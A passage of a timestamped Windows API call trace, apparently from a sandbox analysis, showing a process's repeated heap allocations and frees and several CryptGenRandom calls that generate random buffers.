[0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9b50 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9ac0 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9a30 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e99a0 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9910 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9880 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e97f0 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9760 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e96d0 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8c20 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8cb0 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8d40 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8dd0 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8e60 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ef0 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8f80 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9010 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e90a0 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9130 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e91c0 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9250 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e92e0 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9370 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9400 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9490 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0032.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0032.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0032.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0032.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0032.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0032.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0032.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9b50 | out: hHeap=0x2b0000) returned 1 [0032.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9a30 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e99a0 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9910 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9880 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e97f0 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9760 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e96d0 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8c20 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8cb0 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8d40 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8dd0 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8e60 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ef0 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8f80 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9010 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e90a0 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9130 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e91c0 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9250 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e92e0 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9370 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9400 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9490 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6c80 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0032.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead18 | out: hHeap=0x2b0000) returned 1 [0032.800] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.801] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.801] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.801] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.802] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.802] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.802] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.803] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.803] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.803] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.804] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.804] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.804] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.805] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.805] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.805] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0032.805] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6c80 [0032.805] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0032.805] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2eac90) returned 1 [0032.805] CryptGenRandom (in: hProv=0x2eac90, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0032.805] CryptReleaseContext (hProv=0x2eac90, dwFlags=0x0) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eac08 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d18 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2ead18 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae28 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eaf38 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2e80f0 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf38 | out: hHeap=0x2b0000) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8208 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9520 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8318 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.808] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae28 | out: hHeap=0x2b0000) returned 1 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8208 | out: hHeap=0x2b0000) returned 1 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e80f0 | out: hHeap=0x2b0000) returned 1 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8318 | out: hHeap=0x2b0000) returned 1 [0032.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9490 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9400 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9370 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e92e0 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9250 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e91c0 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9130 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e90a0 [0032.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9010 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8f80 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ef0 [0032.810] 